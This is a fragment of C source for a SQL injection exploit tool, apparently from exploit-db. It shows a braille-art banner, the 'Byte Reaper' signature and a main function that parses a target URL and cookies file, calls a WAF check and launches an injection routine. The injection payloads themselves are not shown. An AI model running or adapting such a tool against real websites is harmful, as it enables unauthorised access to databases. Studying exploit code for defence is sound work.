"⣴⣿⣿⡇⠀⠀⠀⠀⠸⣆⠀⠘⡿⣿⣿⣅⡀⢀⠟⠸⠀⢻⡥⠀⠀⣿⡄⢸⣆⣱⣀⠙⣦⢯⢳⠀⣸⢧⡇⣿⠀⠸⠀⠀⣸⣇⢳⠀⠘⢇⢹⡀⠀⣇⠃⠀⠀⡇⠀⡌⢷⡈⣆⠀⠀\n" "⣿⣿⣿⡇⠀⠀⠀⠀⠀⠹⣄⢠⣿⣿⠟⠋⣵⠏⠀⠀⠀⠸⡇⠈⠙⡟⠛⢺⡷⣶⣯⣭⣈⣿⡟⡇⡟⡼⡇⣿⠀⡇⠀⢀⣿⡞⠚⡀⣼⠘⠆⣇⠀⢸⠀⠀⢀⡇⠀⠁⢀⡷⣜⣄⠀\n" "⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⠘⢺⡏⢿⣤⠞⠁⠀⠀⠀⠀⠀⣷⠀⠀⠀⠀⠸⡇⠀⢳⠈⠙⠻⢿⣿⢀⣧⡇⣿⣰⠃⢀⣾⣿⣵⠀⣠⠏⡇⠀⣿⠀⡎⢠⣠⣼⡇⠀⢸⢿⡇⠘⠻⣄\n" "⣿⣿⣿⠒⠒⠒⠒⠒⠒⠒⠀⢸⡇⠀⢧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⣴⠈⠃⠀⠀⣸⠏⣼⡸⡟⣳⠃⢀⡞⣏⢋⣼⡟⠁⠀⡇⢠⠏⣸⣱⣾⣟⡿⡡⢀⡿⡿⡇⠀⠀⠈ \n" "⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠘⣇⠀⠀⢹⡦⠤⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⡟⠀⠀⠀⣰⠏⠀⢃⢧⡷⠃⣠⠏⠀⠉⡾⢹⢻⠀⡶⠣⠎⢀⣾⣻⠿⣸⠛⢡⡞⣼⠁⠱⠀⠀\n" "⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⡇⠀⠀⠖⠁⠀⠀⠞⡞⢁⣴⠥⠖⠛⢿⢷⣾⡾⡆⣿⣶⣋⣾⣿⣏⠀⢹⡾⠋⢰⠁⠀⠀⠀⠀⠀\n" "⣿⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣇⠰⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⡿⠁⠀⠀⠀⠀⠀⢀⣼⣵⡞⠁⢀⡔⠀⣿⣁⣼⠅⣧⠁⠘⣿⡼⠋⢸⡆⠀⢷⢸⠀⠀⠀⠀⠀⠀⠀\n" "⡏⠈⠉⠲⣄⡀⠀⠀⢀⣀⣤⣶⣿⣿⠀⢈⠙⠶⢦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⠁⢸⠃⢉⡿⠀⠀⢸⣽⠃⠀⠹⣄⣼⠷⠃⠀⠀⢳⠀⠘⣯⢧⠀⠀⠀⠀⠀⠀\n" "⣤⣤⣤⣤⣤⣽⣷⣿⣿⣿⣿⣿⣿⣿⡇⠀⠙⠲⣤⠈⠙⠲⣤⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣬⣤⠤⠖⠚⠛⠉⠀⠀⠀⠀⣿⠀⠀⠀⣿⠁⠀⠀⠀⢀⣼⠃⢰⡏⠀⠁⠀⠀⠀⠀⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡼⠁⠀⠀⣼⠙⠂⠀⣀⡶⠋⢀⣠⠞⠁⠀⠀⠀⠀⠀⠀⠀\n " "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠴⠚⠉⠀⠀⢀⡴⠁⠀⣠⠞⢁⣴⢾⣯⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⣀⣀⣀⣀⣀⣀⡠⢤⠞⠁⠀⠀⠀⠀⠀⠀⢀⣠⠤⠞⠋⢁⣀⣠⠤⠴⠚⠉⣀⣠⠜⢁⡴⣿⣧⣸⣿⣿⣿⣿⣿⣷⣶⣶⣦⣤⣄ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠉⠻⣅⠀⠀⠀⠀⡞⠀⠀⠀⠀⠀⢀⣠⠖⠋⠁⠀⠒⠊⠉⠁⠀⠀⠀⢀⣀⣭⣤⡖⢋⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠈⠓⠦⣄⣸⠁⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⣀⡤⠴⢺⣿⣿⣿⣿⣿⣿⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⢻⣀⣀⡤⠴⠶⠶⠶⠶⠦⢤⣤⠖⠋⠁⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿ \n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⡞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣷⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⣀⡤⠴⠶⠶⠶⢤⣀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀\n" "⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⡴⠋⠁⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀\n" ); const char *name = "\e[1;37m\t\t\t[ Byte Reaper ]\e[0m\n"; int s = 0; while (name[s] != '\0') { printf("%c", name[s]); fflush(stdout); usleep(100000); s++; } printf("---------------------------------------------------------------------\n"); struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &yourUrl, "Target Url (Base URL)"), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!yourUrl) { printf("\e[1;31m[-] Please Enter Your Url !\e[0m\n"); printf("\e[1;31m[-] Ex : ./exploit -u http://URL\\e[0mn"); printf("\e[1;31m[-] Exit Syscall\e[0m\n"); exitAssembly(); } checkWaf(yourUrl); printf("---------------------------------------------------------------------\e[0m\n\n"); printf("[+] Start Exploit Sql...\e[0m\n"); if (cookies) { selecetCookie = 1; } if (verbose) { verbose = 1; } injection(yourUrl); return 0; }
exploit-db.comJul 28, 2025extracted